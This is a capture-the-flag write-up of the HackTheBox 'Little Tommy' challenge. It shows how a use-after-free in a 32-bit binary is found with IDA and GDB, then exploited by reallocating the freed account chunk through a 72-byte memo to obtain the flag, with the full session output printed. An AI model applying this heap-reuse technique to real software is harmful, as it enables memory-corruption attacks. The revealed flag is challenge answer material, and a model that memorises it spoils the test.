HackTheBox – Little Tommy Write-up

Hi everyone! Today’s post is on Little Tommy, a medium challenge on HackTheBox which was created on 27th September 2017. However, this challenge is actually quite easy and straightforward. The only difficult part is to identify the vulnerability which is Use-after-Free (UaF). Once you know it, obtaining the flag is very straightforward. Let’s get started!

Files provided

You may also download my IDA Free database Version 7.0.190307 Windows x64 of this program here which contains renamed functions, variables, and included comments.

Program type

Using the “file” command, we can see that it is a 32-bits program. We either have to use Kali, a 32-bits GNU/Linux system, or those that support 32-bits programs.

kali@kali~$ file little_tommy 
little_tommy: ELF 32-bit LSB executable, ...

I am using Kali Linux hence it is okay for me to run the program. I set the permission of it to allow execution.

kali@kali~$ chmod +x little_tommy

Outlook of the program

Page 1

kali@kali~$ ./little_tommy 

#################### Welcome to Little Tommy's Handy yet Elegant and Advanced Program ####################

1. Create account
2. Display account
3. Delete account
4. Add memo
5. Print flag

Please enter an operation number: 
1. Create account
2. Display account
3. Delete account
4. Add memo
5. Print flag

Please enter an operation number: 5

Nope.

Create account

Creating an account will give us a reference number. Even if we created an account, we still cannot print the flag as the message will still be “nope”.

1. Create account
2. Display account
3. Delete account
4. Add memo
5. Print flag

Please enter an operation number: 1

First name: gg
Last name: gg

Thank you, your account number 149518784.

Reverse engineering

Before we begin, you can download my IDA Free database Version 7.0.190307 Windows x64 of this program here which contains renamed functions, variables, and included comments.

Account number

If we open the program in IDA, we will see main_account contains an address to be created by malloc when we are creating an account in main() if we chose option 1.

If we continue to trace the execution flow of the Account Creation option, we will see that the main_account‘s content at offset 0 is being printed as the account number. If you are confused, remember that printf(“\nThank you, your account number %d\n”, acctNum);, acctNum being passed to printf() is in a form of an address to the actual integer. Hence, register EAX which is the address of main_account is passed to printf() as an argument.

Flag condition

Let’s take a look at option 5, which is Print Flag’s assembly instructions. We will see there is a condition in which is the value pointed to a pointer at main_account’s offset 0x40 must be 0x6B637566 (“kcuf”). Otherwise, it will just print “Nope” to us like what we experienced earlier when we were playing around with the options in the program.

Offset 0x40 of main_account

Now that we know at offset 0x40, it will check if the value before showing us the flag, we can see that offset 0x40 is actually the balance amount from option 2 (Display Account).

Therefore, offset 0x0 contains the account number which is also the first name, offset 0x20 contains the last name, and finally offset 0x40 contains the account balance.

If we check out the whole source code, we won’t see how main_account’s account balance at offset 0x40 is being written. By default, it will contain the value of 0.

Use-after-Free vulnerability discovery

If we try to create an account first, then delete the account, and finally display the account, we will be surprised to find out we still can see the account’s content. Some slight changes will be seen due to free() will modify the buffer.

kali@kali~$ ./little_tommy

#################### Welcome to Little Tommy's Handy yet Elegant and Advanced Program ####################

1. Create account
2. Display account
3. Delete account
4. Add memo
5. Print flag

Please enter an operation number: 1

First name: hello
Last name: gg

Thank you, your account number 147941824.

1. Create account
2. Display account
3. Delete account
4. Add memo
5. Print flag

Please enter an operation number: 3

Account deleted successfully

1. Create account
2. Display account
3. Delete account
4. Add memo
5. Print flag

Please enter an operation number: 2

################ Account no. 147941824 ################
First name: �
Last name: gg
Account balance: 0

If we look at the assembly instructions of deleting an account, we will see free() is called on main_account but the content of main_account is never removed. This means we still can access the buffer after freeing it from main_account. As a result, this is known as Use-after-Free (UaF).

Exploitation

You might be wondering how on earth is Use-after-Free (UaF) going to help us write to main_account offset 0x40. Well, if we look at option 4 (Add Memo), we will see that it has strdup(). strdup() actually uses malloc to create a memory for a new string to be copied. Since it uses malloc, we can create a string that is 0x48 (72) bytes long so that malloc(72) will be used which will allow the system to allocate the same memory location as main_acount since that space has already been freed.

If we input “fuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckf” which is 71 bytes (72 bytes in total when it automatically includes ‘\n’ when we press ENTER), offsets 0x40 in main_account will automatically be overwritten with “kcuf”. Note that what we input in as string will be stored in little-endian format. This means for every 4 bytes, the letters will be arranged in reverse order.

Of course, you can input other strings too as long as the 0x40th position is “fuck” will be fine. For simplicity’s sake, I just replicate the words.

Checking with GDB

I used GDB to check if main_account and memo point to the same heap before trying to obtain the flag locally. Note that this time around, I didn’t input anything for the names as it isn’t required.

kali@kali~$ gdb ./little_tommy
(gdb) r
Starting program: /home/kali/Documents/CTF/Pwn/LittleTommy/little_tommy 

#################### Welcome to Little Tommy's Handy yet Elegant and Advanced Program ####################

1. Create account
2. Display account
3. Delete account
4. Add memo
5. Print flag

Please enter an operation number: 1

First name: 
Last name: 

Thank you, your account number 134527424.

1. Create account
2. Display account
3. Delete account
4. Add memo
5. Print flag

Please enter an operation number: ^C
Program received signal SIGINT, Interrupt.
0xf7fc9559 in __kernel_vsyscall ()
(gdb) x/x *0x0804A048
0x804b9c0:      0x00000000
(gdb) c
Continuing.



1. Create account
2. Display account
3. Delete account
4. Add memo
5. Print flag

Please enter an operation number: 3

Account deleted successfully

1. Create account
2. Display account
3. Delete account
4. Add memo
5. Print flag

Please enter an operation number: 4

Please enter memo:
fuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckf

Thank you, please keep this reference number number safe: 134527424.

1. Create account
2. Display account
3. Delete account
4. Add memo
5. Print flag

Please enter an operation number: ^C
Program received signal SIGINT, Interrupt.
0xf7fc9559 in __kernel_vsyscall ()
(gdb) x/x *0x0804A04C
0x804b9c0:      0x6b637566
(gdb) x/s *0x0804A04C
0x804b9c0:      "fuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckf\n"
(gdb) c
Continuing.



1. Create account
2. Display account
3. Delete account
4. Add memo
5. Print flag

Please enter an operation number: 5
[Detaching after vfork from child process 2187]
/bin/cat: flag: No such file or directory

We can see that both main_account (0x0804A048) and memo (0x0804A04C) points to the same heap location 0x804b9c0. When we continued execution, we can see it works as the IF condition passes. File /bin/flag was tried to be obtained but failed. Thus, we can now try it on HackTheBox’s server.

Flag

As a result, we can directly use netcat to access the server in HackTheBox and manually exploit the program. You can create a script for it but I find it a hassle to do so since the exploitation steps are very straightforward.

kali@kali~$ nc 157.245.35.236 30136

#################### Welcome to Little Tommy's Handy yet Elegant and Advanced Program ####################

1. Create account
2. Display account
3. Delete account
4. Add memo
5. Print flag

Please enter an operation number: 1
1

First name: 

Last name: 


Thank you, your account number 166459416.

1. Create account
2. Display account
3. Delete account
4. Add memo
5. Print flag

Please enter an operation number: 3
3

Account deleted successfully

1. Create account
2. Display account
3. Delete account
4. Add memo
5. Print flag

Please enter an operation number: 4
4

Please enter memo:
fuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckf
fuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckf

Thank you, please keep this reference number number safe: 166459416.

1. Create account
2. Display account
3. Delete account
4. Add memo
5. Print flag

Please enter an operation number: 5
5
HTB{I_am_so_heaped_up_right_now}

If you are still confused regarding UaF, I would recommend you to watch this awesome LiveOverFlow’s video on UaF.

I hope this article has been helpful to you. Feel free to leave any comments below. You may also send me some tips if you like my work and want to see more of such content. Funds will mostly be used for my boba milk tea addiction. The link is here. 🙂

Leave a Reply

Please log in using one of these methods to post your comment:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

This site uses Akismet to reduce spam. Learn how your comment data is processed.